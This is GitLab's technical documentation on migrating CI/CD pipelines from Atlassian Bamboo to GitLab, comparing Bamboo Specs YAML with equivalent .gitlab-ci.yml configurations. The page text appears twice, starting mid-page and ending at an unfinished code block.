Examples of executors are shell, Docker, or Kubernetes. You can choose to use [GitLab.com runners](../runners/_index.md) or deploy your own [self-managed runners](https://docs.gitlab.com/runner/install/).

### Workflow

[Bamboo workflow](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) is organized into projects. Projects are used to organize Plans, along with variables, shared credentials, and permissions needed by multiple plans. A plan groups jobs into stages and links to code repositories where applications to be built are hosted. Repositories could be in Bitbucket, GitLab, or other services. A job is a series of tasks that are executed sequentially on the same Bamboo agent.

CI and deployments are treated separately in Bamboo. The [deployment project workflow](https://confluence.atlassian.com/bamboo/deployment-projects-workflow-362971857.html) is different from the build plans workflow. [Learn more](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) about Bamboo workflow.

GitLab CI/CD uses a similar workflow. Jobs are organized into [stages](../yaml/_index.md#stage), and projects have individual `.gitlab-ci.yml` configuration files or include existing templates.

### Templating & Configuration as Code

#### Bamboo Specs

Bamboo plans can be configured in either the Web UI or with Bamboo Specs. [Bamboo Specs](https://confluence.atlassian.com/bamboo/bamboo-specs-894743906.html) is configuration as code, which can be written in Java or YAML. [YAML Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) is the easiest to use but lacks full Bamboo feature coverage. [Java Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?java) has complete Bamboo feature coverage and can be written in any JVM language like Groovy, Scala, or Kotlin.
If you configured your plans using the Web UI, you can [export your Bamboo configuration](https://confluence.atlassian.com/bamboo/exporting-existing-plan-configuration-to-bamboo-yaml-specs-1018270696.html) into Bamboo Specs. Bamboo Specs can also be [repository-stored](https://confluence.atlassian.com/bamboo/enabling-repository-stored-bamboo-specs-938641941.html). #### `.gitlab-ci.yml` configuration file GitLab, by default, uses a `.gitlab-ci.yml` file for CI/CD configuration. Alternatively, [Auto DevOps](../../topics/autodevops/_index.md) can automatically build, test, and deploy your application without a manually configured `.gitlab-ci.yml` file. GitLab CI/CD configuration can be organized into templates that are reusable across projects. GitLab also provides pre-built [templates](../examples/_index.md#cicd-templates) that help you get started quickly and avoid re-inventing the wheel. ### Configuration #### Bamboo YAML Spec syntax This Bamboo Spec was exported from a Bamboo Server instance, which creates quite verbose output: ```yaml version: 2 plan: project-key: AB key: TP name: test plan stages: - Default Stage: manual: false final: false jobs: - Default Job Default Job: key: JOB1 tasks: - checkout: force-clean-build: false description: Checkout Default Repository - script: interpreter: SHELL scripts: - |- ruby -v # Print out ruby version for debugging bundle config set --local deployment true # Install dependencies into ./vendor/ruby bundle install -j $(nproc) rubocop rspec spec description: run bundler artifact-subscriptions: [] repositories: - Demo Project: scope: global triggers: - polling: period: '180' branches: create: manually delete: never link-to-jira: true notifications: [] labels: [] dependencies: require-all-stages-passing: false enabled-for-branches: true block-strategy: none plans: [] other: concurrent-build-plugin: system-default --- version: 2 plan: key: AB-TP plan-permissions: - users: - root permissions: - view - edit - build - clone - admin 
      - view-configuration
  - roles:
      - logged-in
      - anonymous
    permissions:
      - view
...
```

A GitLab CI/CD `.gitlab-ci.yml` configuration with similar behavior would be:

```yaml
default:
  image: ruby:latest

stages:
  - default-stage

job1:
  stage: default-stage
  script:
    - ruby -v                                # Print out ruby version for debugging
    - bundle config set --local deployment true  # Install dependencies into ./vendor/ruby
    - bundle install -j $(nproc)
    - rubocop
    - rspec spec
```

### Common Configurations

This section reviews some common Bamboo configurations and the GitLab CI/CD equivalents.

#### Workflow

Bamboo is structured differently compared to GitLab CI/CD. With GitLab, CI/CD can be enabled in a project in a number of ways: by adding a `.gitlab-ci.yml` file to the project, through a compliance pipeline in the group the project belongs to, or by enabling Auto DevOps. Pipelines are then triggered automatically, based on rules or, where Auto DevOps is used, on context.

In Bamboo, [repositories need to be added](https://confluence.atlassian.com/bamboo0903/linking-to-source-code-repositories-1236445195.html) to a Bamboo project, with authentication provided, and [triggers](https://confluence.atlassian.com/bamboo0903/triggering-builds-1236445226.html) set. Repositories added to projects are available to all plans in the project. Plans used for testing and building applications are called Build plans.

#### Build Plans

Build Plans in Bamboo are composed of Stages that run sequentially to build an application and generate artifacts where relevant. Build Plans require a default repository attached to them or inherit linked repositories from their parent project. Variables, triggers, and relationships between different plans can be defined at the plan level.
An example of a Bamboo build plan:

```yaml
version: 2
plan:
  project-key: SAMPLE
  name: Build Ruby App
  key: BUILD-APP
stages:
  - Test App:
      jobs:
        - Test Application
        - Perform Security checks
  - Build App:
      jobs:
        - Build Application

Test Application:
  tasks:
    - script:
        - # Run tests

Perform Security checks:
  tasks:
    - script:
        - # Run Security Checks

Build Application:
  tasks:
    - script:
        - # Run builds
```

In this example:

- Plan Specs include a YAML Spec version. Version 2 is the latest.
- The `project-key` links the plan to its parent project. The key is specified when creating the project.
- Plan `key` uniquely identifies the plan.

In GitLab CI/CD, a Bamboo Build plan is similar to the `.gitlab-ci.yml` file in a project, which can include CI/CD scripts from other projects or templates. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: alpine:latest

stages:
  - test
  - build

test-application:
  stage: test
  script:
    - # Run tests

security-checks:
  stage: test
  script:
    - # Run Security Checks

build-application:
  stage: build
  script:
    - # Run builds
```

#### Container Images

Builds and deployments are run by default on the Bamboo agent's native operating system, but can be configured to run in containers. To make jobs run in a container, Bamboo uses the `docker` keyword at the plan or job level. For example, in a Bamboo build plan:

```yaml
version: 2
plan:
  project-key: SAMPLE
  name: Build Ruby App
  key: BUILD-APP
docker: alpine:latest
stages:
  - Build App:
      jobs:
        - Build Application

Build Application:
  tasks:
    - script:
        - # Run builds
  docker:
    image: alpine:edge
```

In GitLab CI/CD, you only need the `image` keyword.
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: alpine:latest

stages:
  - build

build-application:
  stage: build
  script:
    - # Run builds
  image:
    name: alpine:edge
```

#### Variables

Bamboo has the following types of [variables](https://confluence.atlassian.com/bamboo/bamboo-variables-289277087.html) based on scope:

- Build-specific variables which are evaluated at build time. For example `${bamboo.planKey}`.
- System variables inherited from the Bamboo instance or system environment.
- Global variables defined for the entire instance and accessible to every plan.
- Project variables specific to a project and accessible by plans in the same project.
- Plan variables specific to a plan.

You can access variables in Bamboo using the format `${system.variableName}` for System variables and `${bamboo.variableName}` for other types of variables. When using a variable in a script task, the full stops are converted to underscores: `${bamboo.variableName}` becomes `$bamboo_variableName`.

In GitLab, you can define [CI/CD variables](../variables/_index.md) at these levels:

- Instance
- Group
- Project
- In the `.gitlab-ci.yml` file as default variables for all jobs
- In the `.gitlab-ci.yml` file in individual jobs

Like Bamboo's System and Global variables, GitLab has [predefined CI/CD variables](../variables/predefined_variables.md) that are available to every job.

Defining variables in CI/CD scripts is similar in both Bamboo and GitLab. For example, in a Bamboo build plan:

```yaml
version: 2
# ...
variables:
  username: admin
  releaseType: milestone

Default job:
  tasks:
    - script: echo '$bamboo_username is the DRI for $bamboo_releaseType'
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
variables:
  DEFAULT_VAR: "A default variable"

job1:
  variables:
    JOB_VAR: "A job variable"
  script:
    - echo "Variables are '$DEFAULT_VAR' and '$JOB_VAR'"
```

In GitLab CI/CD, variables are accessed like regular Shell script variables.
For example, `$VARIABLE_NAME`.

#### Jobs & Tasks

In both GitLab and Bamboo, jobs in the same stage run in parallel, except where there is a dependency that needs to be met before a job runs. The number of jobs that can run in Bamboo depends on the availability of Bamboo agents and the Bamboo license size. With [GitLab CI/CD](../jobs/_index.md), the number of parallel jobs depends on the number of runners integrated with the GitLab instance and the concurrency set in the runners.

In Bamboo, Jobs are composed of [Tasks](https://confluence.atlassian.com/bamboo/configuring-tasks-289277036.html), which can be:

- A set of commands run as a [script](https://confluence.atlassian.com/bamboo/script-289277046.html)
- Predefined tasks like source code checkout, artifact download, and other tasks available in the Atlassian [tasks marketplace](https://marketplace.atlassian.com/addons/app/bamboo).

For example, in a Bamboo build plan:

```yaml
version: 2
#...
Default Job:
  key: JOB1
  tasks:
    - checkout:
        force-clean-build: false
        description: Checkout Default Repository
    - script:
        interpreter: SHELL
        scripts:
          - |-
            ruby -v
            bundle config set --local deployment true
            bundle install -j $(nproc)
        description: run bundler
other:
  concurrent-build-plugin: system-default
```

The equivalent of Tasks in GitLab is the `script`, which specifies the commands for the runner to execute. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
job1:
  script: "bundle exec rspec"

job2:
  script:
    - ruby -v
    - bundle config set --local deployment true
    - bundle install -j $(nproc)
```

With GitLab, you can use [CI/CD templates](https://gitlab.com/gitlab-org/gitlab-foss/tree/master/lib/gitlab/ci/templates) and [CI/CD components](../components/_index.md) to compose your pipelines without the need to write everything yourself.

#### Conditionals

In Bamboo, every task can have conditions that determine if a task runs. For example, in a Bamboo build plan:

```yaml
version: 2
# ...
tasks:
  - script:
      interpreter: SHELL
      scripts:
        - echo "Hello"
      conditions:
        - variable:
            equals:
              planRepository.branch: development
```

With GitLab, this can be done with the `rules` keyword to [control when jobs run](../jobs/job_control.md) in GitLab CI/CD. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
job:
  script: echo "Hello, Rules!"
  rules:
    - if: $CI_MERGE_REQUEST_SOURCE_BRANCH_NAME == "development"
```

#### Triggers

Bamboo has a number of options for [triggering builds](https://confluence.atlassian.com/bamboo/triggering-builds-289276897.html), which can be based on code changes, a schedule, the outcomes of other plans, or on demand. A plan can be configured to periodically poll a project for new changes. For example, in a Bamboo build plan:

```yaml
version: 2
#...
triggers:
  - polling:
      period: '180'
```

GitLab CI/CD pipelines can be triggered based on code change, on schedule, or triggered by other jobs or API calls. GitLab CI/CD pipelines do not need to use polling, but can be triggered on a schedule as well. You can configure when pipelines themselves run with the [`workflow` keyword](../yaml/workflow.md), and `rules`. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
workflow:
  rules:
    - changes:
        - .gitlab/**/**.md
      when: never
```

#### Artifacts

You can define job artifacts using the `artifacts` keyword in both GitLab and Bamboo. For example, in a Bamboo build plan:

```yaml
version: 2
# ...
Build:
  # ...
  artifacts:
    - name: Test Reports
      location: target/reports
      pattern: '*.xml'
      required: false
      shared: false
    - name: Special Reports
      location: target/reports
      pattern: 'special/*.xml'
      shared: true
```

In this example, artifacts are defined with a name, location, and pattern. You can also share the artifacts with other jobs and plans, or define jobs that subscribe to the artifact.
`artifact-subscriptions` is used to access artifacts from another job in the same plan, for example:

```yaml
Test app:
  artifact-subscriptions:
    - artifact: Test Reports
      destination: deploy
```

`artifact-download` is used to access artifacts from jobs in a different plan, for example:

```yaml
version: 2
# ...
Build:
  # ...
  tasks:
    - artifact-download:
        source-plan: PROJECTKEY-PLANKEY
```

You need to provide the key of the plan you are downloading artifacts from in the `source-plan` keyword.

In GitLab, all [artifacts](../jobs/job_artifacts.md) from completed jobs in earlier stages are downloaded by default. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
stages:
  - build

pdf:
  stage: build
  script: #generate XML reports
  artifacts:
    name: "test-report-files"
    untracked: true
    paths:
      - target/reports
```

In this example:

- The name of the artifact is specified explicitly, but you can make it dynamic by using a CI/CD variable.
- The `untracked` keyword sets the artifact to also include Git untracked files, along with those specified explicitly with `paths`.

#### Caching

In Bamboo, [Git caches](https://confluence.atlassian.com/bamkb/how-stored-git-caches-speed-up-builds-690848923.html) can be used to speed up builds. Git caches are configured in Bamboo administration settings and are stored either on the Bamboo server or remote agents.

GitLab supports both Git caches and job caches. [Caches](../caching/_index.md) are defined per job using the `cache` keyword. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
test-job:
  stage: build
  cache:
    - key:
        files:
          - Gemfile.lock
      paths:
        - vendor/ruby
    - key:
        files:
          - yarn.lock
      paths:
        - .yarn-cache/
  script:
    - bundle config set --local path 'vendor/ruby'
    - bundle install
    - yarn install --cache-folder .yarn-cache
    - echo Run tests...
```

#### Deployment Projects

Bamboo has [Deployment projects](https://confluence.atlassian.com/bamboo/deployment-projects-338363438.html), which link to build plans to track, fetch, and deploy artifacts to [deployment environments](https://confluence.atlassian.com/bamboo0903/creating-a-deployment-environment-1236445634.html). When creating a deployment project, you link it to a build plan, then specify the deployment environment and the tasks to perform the deployments. A [deployment task](https://confluence.atlassian.com/bamboo0903/tasks-for-deployment-environments-1236445662.html) can either be a script or a Bamboo task from the Atlassian marketplace. For example, in a deployment project Spec:

```yaml
version: 2
deployment:
  name: Deploy ruby app
  source-plan: build-app
release-naming: release-1.0
environments:
  - Production

Production:
  tasks:
    - # scripts to deploy app to production
    - ./.ci/deploy_prod.sh
```

In GitLab CI/CD, you can create a [deployment job](../jobs/_index.md#deployment-jobs) that deploys to an [environment](../environments/_index.md) or creates a [release](../../user/project/releases/_index.md). For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
deploy-to-production:
  stage: deploy
  script:
    - # Run Deployment script
    - ./.ci/deploy_prod.sh
  environment:
    name: production
```

To create a release instead, use the [`release`](../yaml/_index.md#release) keyword with the [release-cli](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs) tool to create releases for [Git tags](../../user/project/repository/tags/_index.md). For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
release_job:
  stage: release
  image: registry.gitlab.com/gitlab-org/release-cli:latest
  rules:
    - if: $CI_COMMIT_TAG  # Run this job when a tag is created manually
  script:
    - echo "Building release version"
  release:
    tag_name: $CI_COMMIT_TAG
    name: 'Release $CI_COMMIT_TAG'
    description: 'Release created using the release-cli.'
```

### Security Scanning features

Bamboo relies on third-party tasks provided in the Atlassian Marketplace to run security scans. GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these scanners in GitLab using templates. For example, to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`:

```yaml
include:
  - template: Jobs/SAST.gitlab-ci.yml
```

You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables).

### Secrets Management

Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments.

Secrets management in Bamboo is usually handled using [Shared credentials](https://confluence.atlassian.com/bamboo/shared-credentials-424313357.html), or with third-party applications from the Atlassian marketplace.

For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service:

- [HashiCorp Vault](../secrets/hashicorp_vault.md)
- [Azure Key Vault](../secrets/azure_key_vault.md)
- [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md)

GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third-party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Bamboo](https://confluence.atlassian.com/bamboo/bamboo-specs-encryption-970268127.html).
You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ### Migration Plan The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. #### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from Bamboo, ask yourself the following questions in preparation: - What Bamboo Tasks are used by jobs in Bamboo today? - Do you know what these Tasks do exactly? - Do any Task wrap a common build tool? For example, Maven, Gradle, or NPM? - What is installed on the Bamboo agents? - Are there any shared libraries in use? - How are you authenticating from Bamboo? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in Bamboo to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? #### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site. 
- Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. #### Migration Steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Export your Bamboo Projects/Plans as YAML Spec 1. Migrate Bamboo YAML Spec configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates. 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrating from Bamboo
breadcrumbs:
- doc
- ci
- migration
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

This migration guide looks at how you can migrate from Atlassian Bamboo to GitLab CI/CD. The focus is on [Bamboo Specs YAML](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) exported from the Bamboo UI or stored in Spec repositories.

## GitLab CI/CD Primer

If you are new to GitLab CI/CD, use the [Getting started guide](../_index.md) to learn the basic concepts and how to create your first [`.gitlab-ci.yml` file](../quick_start/_index.md).

If you already have some experience using GitLab CI/CD, you can review the [CI/CD YAML syntax reference](../yaml/_index.md) to see the full list of available keywords.

You can also take a look at [Auto DevOps](../../topics/autodevops/_index.md), which automatically builds, tests, and deploys your application using a collection of pre-configured features and integrations.

## Key similarities and differences

### Offerings

Atlassian offers Bamboo in its Cloud (SaaS) or Data Center (self-hosted) options. A third Server option is scheduled for [EOL on February 15, 2024](https://about.gitlab.com/blog/2023/09/26/atlassian-server-ending-move-to-a-single-devsecops-platform/). These options are similar to [GitLab.com](../../subscriptions/gitlab_com/_index.md) and [GitLab Self-Managed](../../subscriptions/self_managed/_index.md). GitLab also offers [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service.

### Agents vs Runners

Bamboo uses [agents](https://confluence.atlassian.com/bamboo/configuring-agents-289277172.html) to run builds and deployments.
Agents can be local agents running on the Bamboo server, or remote agents running external to the server. GitLab uses a similar concept to agents called [runners](https://docs.gitlab.com/runner/), which use [executors](https://docs.gitlab.com/runner/executors/) to run builds. Examples of executors are shell, Docker, or Kubernetes. You can choose to use [GitLab.com runners](../runners/_index.md) or deploy your own [self-managed runners](https://docs.gitlab.com/runner/install/).

### Workflow

The [Bamboo workflow](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) is organized into projects. Projects are used to organize Plans, along with variables, shared credentials, and permissions needed by multiple plans. A plan groups jobs into stages and links to the code repositories where the applications to be built are hosted. Repositories could be in Bitbucket, GitLab, or other services. A job is a series of tasks that are executed sequentially on the same Bamboo agent.

CI and deployments are treated separately in Bamboo. The [deployment project workflow](https://confluence.atlassian.com/bamboo/deployment-projects-workflow-362971857.html) is different from the build plans workflow. [Learn more](https://confluence.atlassian.com/bamboo/understanding-the-bamboo-ci-server-289277285.html) about the Bamboo workflow.

GitLab CI/CD uses a similar workflow. Jobs are organized into [stages](../yaml/_index.md#stage), and projects have individual `.gitlab-ci.yml` configuration files or include existing templates.

### Templating & Configuration as Code

#### Bamboo Specs

Bamboo plans can be configured in either the Web UI or with Bamboo Specs. [Bamboo Specs](https://confluence.atlassian.com/bamboo/bamboo-specs-894743906.html) is configuration as code, which can be written in Java or YAML. [YAML Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) are the easiest to use, but lack full Bamboo feature coverage.
[Java Specs](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?java) has complete Bamboo feature coverage and can be written in any JVM language like Groovy, Scala, or Kotlin.

If you configured your plans using the Web UI, you can [export your Bamboo configuration](https://confluence.atlassian.com/bamboo/exporting-existing-plan-configuration-to-bamboo-yaml-specs-1018270696.html) into Bamboo Specs. Bamboo Specs can also be [repository-stored](https://confluence.atlassian.com/bamboo/enabling-repository-stored-bamboo-specs-938641941.html).

#### `.gitlab-ci.yml` configuration file

GitLab, by default, uses a `.gitlab-ci.yml` file for CI/CD configuration. Alternatively, [Auto DevOps](../../topics/autodevops/_index.md) can automatically build, test, and deploy your application without a manually configured `.gitlab-ci.yml` file.

GitLab CI/CD configuration can be organized into templates that are reusable across projects. GitLab also provides pre-built [templates](../examples/_index.md#cicd-templates) that help you get started quickly and avoid re-inventing the wheel.
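As a brief sketch of how that reuse works, a project's `.gitlab-ci.yml` file can pull configuration in with the `include` keyword. The `Jobs/SAST.gitlab-ci.yml` template ships with GitLab; the project path and file name in the second entry are placeholders:

```yaml
include:
  # A built-in template shipped with GitLab
  - template: Jobs/SAST.gitlab-ci.yml
  # A shared file from another project on the same instance
  # (project path and file name are hypothetical)
  - project: my-group/ci-templates
    ref: main
    file: /templates/build.yml
```

Jobs defined in the included files are merged into the project's pipeline as if they were written directly in the `.gitlab-ci.yml` file.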
### Configuration

#### Bamboo YAML Spec syntax

This Bamboo Spec was exported from a Bamboo Server instance, which creates quite verbose output:

```yaml
version: 2
plan:
  project-key: AB
  key: TP
  name: test plan
stages:
- Default Stage:
    manual: false
    final: false
    jobs:
    - Default Job
Default Job:
  key: JOB1
  tasks:
  - checkout:
      force-clean-build: false
      description: Checkout Default Repository
  - script:
      interpreter: SHELL
      scripts:
      - |-
        ruby -v  # Print out ruby version for debugging
        bundle config set --local deployment true  # Install dependencies into ./vendor/ruby
        bundle install -j $(nproc)
        rubocop
        rspec spec
      description: run bundler
  artifact-subscriptions: []
repositories:
- Demo Project:
    scope: global
triggers:
- polling:
    period: '180'
branches:
  create: manually
  delete: never
  link-to-jira: true
notifications: []
labels: []
dependencies:
  require-all-stages-passing: false
  enabled-for-branches: true
  block-strategy: none
  plans: []
other:
  concurrent-build-plugin: system-default

---
version: 2
plan:
  key: AB-TP
plan-permissions:
- users:
  - root
  permissions:
  - view
  - edit
  - build
  - clone
  - admin
  - view-configuration
- roles:
  - logged-in
  - anonymous
  permissions:
  - view
...
```

A GitLab CI/CD `.gitlab-ci.yml` configuration with similar behavior would be:

```yaml
default:
  image: ruby:latest

stages:
  - default-stage

job1:
  stage: default-stage
  script:
    - ruby -v  # Print out ruby version for debugging
    - bundle config set --local deployment true  # Install dependencies into ./vendor/ruby
    - bundle install -j $(nproc)
    - rubocop
    - rspec spec
```

### Common Configurations

This section reviews some common Bamboo configurations and the GitLab CI/CD equivalents.

#### Workflow

Bamboo is structured differently compared to GitLab CI/CD. With GitLab, CI/CD can be enabled in a project in a number of ways: by adding a `.gitlab-ci.yml` file to the project, through a compliance pipeline in the group the project belongs to, or by enabling Auto DevOps.
Pipelines are then triggered automatically, depending on rules or context, where Auto DevOps is used.

Bamboo is structured differently: [repositories need to be added](https://confluence.atlassian.com/bamboo0903/linking-to-source-code-repositories-1236445195.html) to a Bamboo project, with authentication provided, and [triggers](https://confluence.atlassian.com/bamboo0903/triggering-builds-1236445226.html) are set. Repositories added to projects are available to all plans in the project. Plans used for testing and building applications are called Build plans.

#### Build Plans

Build Plans in Bamboo are composed of Stages that run sequentially to build an application and generate artifacts where relevant. Build Plans require a default repository attached to them, or inherit linked repositories from their parent project. Variables, triggers, and relationships between different plans can be defined at the plan level.

An example of a Bamboo build plan:

```yaml
version: 2
plan:
  project-key: SAMPLE
  name: Build Ruby App
  key: BUILD-APP
stages:
  - Test App:
      jobs:
        - Test Application
        - Perform Security checks
  - Build App:
      jobs:
        - Build Application
Test Application:
  tasks:
    - script:
        - # Run tests
Perform Security checks:
  tasks:
    - script:
        - # Run Security Checks
Build Application:
  tasks:
    - script:
        - # Run builds
```

In this example:

- Plan Specs include a YAML Spec version. Version 2 is the latest.
- The `project-key` links the plan to its parent project. The key is specified when creating the project.
- The plan `key` uniquely identifies the plan.

In GitLab CI/CD, a Bamboo Build plan is similar to the `.gitlab-ci.yml` file in a project, which can include CI/CD scripts from other projects or templates.
The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: alpine:latest

stages:
  - test
  - build

test-application:
  stage: test
  script:
    - # Run tests

security-checks:
  stage: test
  script:
    - # Run Security Checks

build-application:
  stage: build
  script:
    - # Run builds
```

#### Container Images

Builds and deployments run by default on the Bamboo agent's native operating system, but can be configured to run in containers. To make jobs run in a container, Bamboo uses the `docker` keyword at the plan or job level. For example, in a Bamboo build plan:

```yaml
version: 2
plan:
  project-key: SAMPLE
  name: Build Ruby App
  key: BUILD-APP
docker: alpine:latest
stages:
  - Build App:
      jobs:
        - Build Application
Build Application:
  tasks:
    - script:
        - # Run builds
  docker:
    image: alpine:edge
```

In GitLab CI/CD, you only need the `image` keyword. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
default:
  image: alpine:latest

stages:
  - build

build-application:
  stage: build
  script:
    - # Run builds
  image:
    name: alpine:edge
```

#### Variables

Bamboo has the following types of [variables](https://confluence.atlassian.com/bamboo/bamboo-variables-289277087.html) based on scope:

- Build-specific variables, which are evaluated at build time. For example `${bamboo.planKey}`.
- System variables inherited from the Bamboo instance or system environment.
- Global variables defined for the entire instance and accessible to every plan.
- Project variables specific to a project and accessible by plans in the same project.
- Plan variables specific to a plan.

You can access variables in Bamboo using the format `${system.variableName}` for System variables and `${bamboo.variableName}` for other types of variables. When using a variable in a script task, the full stops are converted to underscores, so `${bamboo.variableName}` becomes `$bamboo_variableName`.
In GitLab, you can define [CI/CD variables](../variables/_index.md) at these levels:

- Instance
- Group
- Project
- In the `.gitlab-ci.yml` file as default variables for all jobs
- In the `.gitlab-ci.yml` file in individual jobs

Like Bamboo's System and Global variables, GitLab has [predefined CI/CD variables](../variables/predefined_variables.md) that are available to every job.

Defining variables in CI/CD scripts is similar in both Bamboo and GitLab. For example, in a Bamboo build plan:

```yaml
version: 2
# ...
variables:
  username: admin
  releaseType: milestone
Default job:
  tasks:
    - script: echo '$bamboo_username is the DRI for $bamboo_releaseType'
```

The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be:

```yaml
variables:
  DEFAULT_VAR: "A default variable"

job1:
  variables:
    JOB_VAR: "A job variable"
  script:
    - echo "Variables are '$DEFAULT_VAR' and '$JOB_VAR'"
```

In GitLab CI/CD, variables are accessed like regular shell script variables, for example `$VARIABLE_NAME`.

#### Jobs & Tasks

In both GitLab and Bamboo, jobs in the same stage run in parallel, except where there is a dependency that needs to be met before a job runs. The number of jobs that can run in Bamboo depends on the availability of Bamboo agents and the Bamboo license size. With [GitLab CI/CD](../jobs/_index.md), the number of parallel jobs depends on the number of runners integrated with the GitLab instance and the concurrency set in the runners.

In Bamboo, Jobs are composed of [Tasks](https://confluence.atlassian.com/bamboo/configuring-tasks-289277036.html), which can be:

- A set of commands run as a [script](https://confluence.atlassian.com/bamboo/script-289277046.html).
- Predefined tasks like source code checkout, artifact download, and other tasks available in the Atlassian [tasks marketplace](https://marketplace.atlassian.com/addons/app/bamboo).

For example, in a Bamboo build plan:

```yaml
version: 2
#...
Default Job:
  key: JOB1
  tasks:
    - checkout:
        force-clean-build: false
        description: Checkout Default Repository
    - script:
        interpreter: SHELL
        scripts:
          - |-
            ruby -v
            bundle config set --local deployment true
            bundle install -j $(nproc)
        description: run bundler
  other:
    concurrent-build-plugin: system-default
```

The equivalent of Tasks in GitLab is the `script`, which specifies the commands for the runner to execute. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
job1:
  script: "bundle exec rspec"

job2:
  script:
    - ruby -v
    - bundle config set --local deployment true
    - bundle install -j $(nproc)
```

With GitLab, you can use [CI/CD templates](https://gitlab.com/gitlab-org/gitlab-foss/tree/master/lib/gitlab/ci/templates) and [CI/CD components](../components/_index.md) to compose your pipelines without the need to write everything yourself.

#### Conditionals

In Bamboo, every task can have conditions that determine if a task runs. For example, in a Bamboo build plan:

```yaml
version: 2
# ...
tasks:
  - script:
      interpreter: SHELL
      scripts:
        - echo "Hello"
      conditions:
        - variable:
            equals:
              planRepository.branch: development
```

With GitLab, this can be done with the `rules` keyword to [control when jobs run](../jobs/job_control.md) in GitLab CI/CD. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
job:
  script: echo "Hello, Rules!"
  rules:
    - if: $CI_MERGE_REQUEST_SOURCE_BRANCH_NAME == "development"
```

#### Triggers

Bamboo has a number of options for [triggering builds](https://confluence.atlassian.com/bamboo/triggering-builds-289276897.html), which can be based on code changes, a schedule, the outcomes of other plans, or on demand. A plan can be configured to periodically poll a project for new changes. For example, in a Bamboo build plan:

```yaml
version: 2
#...
triggers:
  - polling:
      period: '180'
```

GitLab CI/CD pipelines can be triggered based on code changes, on a schedule, or by other jobs or API calls.
GitLab CI/CD pipelines do not need to use polling, but can be triggered on a schedule as well. You can configure when pipelines themselves run with the [`workflow` keyword](../yaml/workflow.md) and `rules`. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
